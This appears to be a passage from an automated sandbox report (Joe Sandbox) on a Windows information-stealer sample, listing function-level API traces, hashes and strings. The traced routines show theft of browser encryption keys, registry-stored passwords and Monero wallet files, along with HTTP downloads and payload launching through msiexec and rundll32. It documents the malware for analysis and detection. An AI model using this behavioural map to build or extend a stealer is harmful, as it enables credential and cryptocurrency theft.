                          • ShellExecuteEx.SHELL32(0000003C), ref: 00AF335D
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00AF34EA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExecuteShell$lstrcpy
                          • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                          • API String ID: 2507796910-3625054190
                          • Opcode ID: a77bc27ddbfb92ffa5206e6e68f7771524c0feaf4d0f8416d4c744ff25776984
                          • Instruction ID: 1794620a87898fa212b6c9e0fe1e99f361fe97fc91c134d22da553d7045a8235
                          • Opcode Fuzzy Hash: a77bc27ddbfb92ffa5206e6e68f7771524c0feaf4d0f8416d4c744ff25776984
                          • Instruction Fuzzy Hash: 55120FB191010C9ADB15FBD0CE92FFDB778AF24340F504169F60A66195EF742B4ACBA2
                          Function 00AF52C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00AFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00AFA7E6
                            • Part of subcall function 00AE6280: InternetOpenA.WININET(00B00DFE,00000001,00000000,00000000,00000000), ref: 00AE62E1
                            • Part of subcall function 00AE6280: StrCmpCA.SHLWAPI(?,0179E258), ref: 00AE6303
                            • Part of subcall function 00AE6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00AE6335
                            • Part of subcall function 00AE6280: HttpOpenRequestA.WININET(00000000,GET,?,0179DDB0,00000000,00000000,00400100,00000000), ref: 00AE6385
                            • Part of subcall function 00AE6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00AE63BF
                            • Part of subcall function 00AE6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00AE63D1
                            • Part of subcall function 00AFA8A0: lstrcpy.KERNEL32(?,00B00E17), ref: 00AFA905
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00AF5318
                          • lstrlen.KERNEL32(00000000), ref: 00AF532F
                            • Part of subcall function 00AF8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00AF8E52
                          • StrStrA.SHLWAPI(00000000,00000000), ref: 00AF5364
                          • lstrlen.KERNEL32(00000000), ref: 00AF5383
                          • lstrlen.KERNEL32(00000000), ref: 00AF53AE
                            • Part of subcall function 00AFA740: lstrcpy.KERNEL32(00B00E17,00000000), ref: 00AFA788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                          • API String ID: 3240024479-1526165396
                          • Opcode ID: 3c78f17495243142edd96236ff1a9232c7ab2b8e934179ef138638f1ec0832b3
                          • Instruction ID: b0647122c4ca839b9339af9caf03fcedd2d01684695932142a9168c0ddf7f2fb
                          • Opcode Fuzzy Hash: 3c78f17495243142edd96236ff1a9232c7ab2b8e934179ef138638f1ec0832b3
                          • Instruction Fuzzy Hash: 4F51FF7091014C9BDB18FFA4CE96EFD7779AF20341F508018F60A9A591EF746B46CBA2
                          Function 00AF12D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: fc7e1e884e99f2560eb6ddbfcbef1413a00f550503abed4f4fed6b8be142c935
                          • Instruction ID: cdd0fdb835aa49dd53aa11514584a69720b2c23f0cce30c2017836d5c56d71c9
                          • Opcode Fuzzy Hash: fc7e1e884e99f2560eb6ddbfcbef1413a00f550503abed4f4fed6b8be142c935
                          • Instruction Fuzzy Hash: A5C166B590021D9BCB14EFA0DD89FFA7778BF64304F004598F60A97241DB74AA85CFA1
                          Function 00AF4280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00AF8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00AF8E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00AF42EC
                          • lstrcat.KERNEL32(?,0179DAE0), ref: 00AF430B
                          • lstrcat.KERNEL32(?,?), ref: 00AF431F
                          • lstrcat.KERNEL32(?,0179CCC8), ref: 00AF4333
                            • Part of subcall function 00AFA740: lstrcpy.KERNEL32(00B00E17,00000000), ref: 00AFA788
                            • Part of subcall function 00AF8D90: GetFileAttributesA.KERNEL32(00000000,?,00AE1B54,?,?,00B0564C,?,?,00B00E1F), ref: 00AF8D9F
                            • Part of subcall function 00AE9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00AE9D39
                            • Part of subcall function 00AE99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00AE99EC
                            • Part of subcall function 00AE99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00AE9A11
                            • Part of subcall function 00AE99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00AE9A31
                            • Part of subcall function 00AE99C0: ReadFile.KERNEL32(000000FF,?,00000000,00AE148F,00000000), ref: 00AE9A5A
                            • Part of subcall function 00AE99C0: LocalFree.KERNEL32(00AE148F), ref: 00AE9A90
                            • Part of subcall function 00AE99C0: CloseHandle.KERNEL32(000000FF), ref: 00AE9A9A
                            • Part of subcall function 00AF93C0: GlobalAlloc.KERNEL32(00000000,00AF43DD,00AF43DD), ref: 00AF93D3
                          • StrStrA.SHLWAPI(?,0179DD38), ref: 00AF43F3
                          • GlobalFree.KERNEL32(?), ref: 00AF4512
                            • Part of subcall function 00AE9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00AE4EEE,00000000,00000000), ref: 00AE9AEF
                            • Part of subcall function 00AE9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00AE4EEE,00000000,?), ref: 00AE9B01
                            • Part of subcall function 00AE9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00AE4EEE,00000000,00000000), ref: 00AE9B2A
                            • Part of subcall function 00AE9AC0: LocalFree.KERNEL32(?,?,?,?,00AE4EEE,00000000,?), ref: 00AE9B3F
                          • lstrcat.KERNEL32(?,00000000), ref: 00AF44A3
                          • StrCmpCA.SHLWAPI(?,00B008D1), ref: 00AF44C0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00AF44D2
                          • lstrcat.KERNEL32(00000000,?), ref: 00AF44E5
                          • lstrcat.KERNEL32(00000000,00B00FB8), ref: 00AF44F4
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                          • String ID:
                          • API String ID: 3541710228-0
                          • Opcode ID: 1cada7d76a555174a07657b51d408eb8ac0b196715b12ba6ec844532cc368d70
                          • Instruction ID: 64ed0e45064b42b45fd19fe5f1fb96b4a67a2ee7d8da1708aebc2204e3803112
                          • Opcode Fuzzy Hash: 1cada7d76a555174a07657b51d408eb8ac0b196715b12ba6ec844532cc368d70
                          • Instruction Fuzzy Hash: 8D7156B6900208ABCB14FBE4DD85FEE7779AB98300F044598F60997181EA75DB45CBA1
                          Function 00AE1310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00AE12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00AE12B4
                            • Part of subcall function 00AE12A0: RtlAllocateHeap.NTDLL(00000000), ref: 00AE12BB
                            • Part of subcall function 00AE12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00AE12D7
                            • Part of subcall function 00AE12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00AE12F5
                            • Part of subcall function 00AE12A0: RegCloseKey.ADVAPI32(?), ref: 00AE12FF
                          • lstrcat.KERNEL32(?,00000000), ref: 00AE134F
                          • lstrlen.KERNEL32(?), ref: 00AE135C
                          • lstrcat.KERNEL32(?,.keys), ref: 00AE1377
                            • Part of subcall function 00AFA740: lstrcpy.KERNEL32(00B00E17,00000000), ref: 00AFA788
                            • Part of subcall function 00AFA9B0: lstrlen.KERNEL32(?,017988E8,?,\Monero\wallet.keys,00B00E17), ref: 00AFA9C5
                            • Part of subcall function 00AFA9B0: lstrcpy.KERNEL32(00000000), ref: 00AFAA04
                            • Part of subcall function 00AFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00AFAA12
                            • Part of subcall function 00AFA8A0: lstrcpy.KERNEL32(?,00B00E17), ref: 00AFA905
                            • Part of subcall function 00AF8B60: GetSystemTime.KERNEL32(00B00E1A,01799AF0,00B005AE,?,?,00AE13F9,?,0000001A,00B00E1A,00000000,?,017988E8,?,\Monero\wallet.keys,00B00E17), ref: 00AF8B86
                            • Part of subcall function 00AFA920: lstrcpy.KERNEL32(00000000,?), ref: 00AFA972
                            • Part of subcall function 00AFA920: lstrcat.KERNEL32(00000000), ref: 00AFA982
                          • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00AE1465
                            • Part of subcall function 00AFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00AFA7E6
                            • Part of subcall function 00AE99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00AE99EC
                            • Part of subcall function 00AE99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00AE9A11
                            • Part of subcall function 00AE99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00AE9A31
                            • Part of subcall function 00AE99C0: ReadFile.KERNEL32(000000FF,?,00000000,00AE148F,00000000), ref: 00AE9A5A
                            • Part of subcall function 00AE99C0: LocalFree.KERNEL32(00AE148F), ref: 00AE9A90
                            • Part of subcall function 00AE99C0: CloseHandle.KERNEL32(000000FF), ref: 00AE9A9A
                          • DeleteFileA.KERNEL32(00000000), ref: 00AE14EF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                          • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                          • API String ID: 3478931302-218353709
                          • Opcode ID: 1e6c1cf48dc7687e8cb904e7c885ce13ac450e13cd5b3743eba8b79cdce161fc
                          • Instruction ID: fba09afe344b5ddf70aa1b0761066ff3011ca1f8f5eb364d3199a8f631889d16
                          • Opcode Fuzzy Hash: 1e6c1cf48dc7687e8cb904e7c885ce13ac450e13cd5b3743eba8b79cdce161fc
                          • Instruction Fuzzy Hash: F451F2F195021D57CB15FB60DE91EFD737CAB64300F4045A8B70EA2091EE706B89CBA6
                          Function 00AE75D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00AE72D0: memset.MSVCRT ref: 00AE7314
                            • Part of subcall function 00AE72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00AE733A
                            • Part of subcall function 00AE72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00AE73B1
                            • Part of subcall function 00AE72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00AE740D
                            • Part of subcall function 00AE72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00AE7452
                            • Part of subcall function 00AE72D0: HeapFree.KERNEL32(00000000), ref: 00AE7459
                          • lstrcat.KERNEL32(00000000,00B017FC), ref: 00AE7606
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00AE7648
                          • lstrcat.KERNEL32(00000000, : ), ref: 00AE765A
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00AE768F
                          • lstrcat.KERNEL32(00000000,00B01804), ref: 00AE76A0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00AE76D3
                          • lstrcat.KERNEL32(00000000,00B01808), ref: 00AE76ED
                          • task.LIBCPMTD ref: 00AE76FB
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                          • String ID: :
                          • API String ID: 3191641157-3653984579
                          • Opcode ID: 8ac3704bd71651f217dbfbfea3d0c09a7a2d98c33ff54ced31b48e59b9ef316b
                          • Instruction ID: dee9884393dc8f5eb78363cbe4c7d1c8b891cd45cd9c7457027071f6e7d91012
                          • Opcode Fuzzy Hash: 8ac3704bd71651f217dbfbfea3d0c09a7a2d98c33ff54ced31b48e59b9ef316b
                          • Instruction Fuzzy Hash: 63317A75900209DBCB18EBA9DD85DFEB7B8FB64302B104508F102A72A0DB38A947DB61
                          Function 00AE72D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 00AE7314
                          • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00AE733A
                          • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00AE73B1
                          • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00AE740D
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00AE7452
                          • HeapFree.KERNEL32(00000000), ref: 00AE7459
                          • task.LIBCPMTD ref: 00AE7555
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$EnumFreeOpenProcessValuememsettask
                          • String ID: Password
                          • API String ID: 2808661185-3434357891
                          • Opcode ID: 192c7eadf2ea60e1aa43bf5446f1ba976b2ddd0ebd5c841b83e3f2271bf25949
                          • Instruction ID: 2f4249ed8abfd8af18ec9db2b50bea6cbbc9431c958818a7e3894870fb399927
                          • Opcode Fuzzy Hash: 192c7eadf2ea60e1aa43bf5446f1ba976b2ddd0ebd5c841b83e3f2271bf25949
                          • Instruction Fuzzy Hash: 54613BB58042A89BDB24DB50DD41BDEB7B8FF44300F0081E9E649A6181EB705FC9CFA1
                          Function 00AF8100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0179DA80,00000000,?,00B00E2C,00000000,?,00000000), ref: 00AF8130
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00AF8137
                          • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00AF8158
                          • __aulldiv.LIBCMT ref: 00AF8172
                          • __aulldiv.LIBCMT ref: 00AF8180
                          • wsprintfA.USER32 ref: 00AF81AC
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                          • String ID: %d MB$@
                          • API String ID: 2774356765-3474575989
                          • Opcode ID: 889ec848685592ef1a461000d120bcfa4fba9a914e6f9dfa701ffe9b586c7fd3
                          • Instruction ID: f37eca11c42be2ba8d219cf555fb9ce195f8a3b9297d58bb3e3a51f8fa7b4fda
                          • Opcode Fuzzy Hash: 889ec848685592ef1a461000d120bcfa4fba9a914e6f9dfa701ffe9b586c7fd3
                          • Instruction Fuzzy Hash: 3421F7B1A44218ABDB10DFD8CD49FAEB7B9FB44B10F104609F705AB280D77869018BA9
                          Function 00AE60A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                          Download Yara Rule
                          APIs
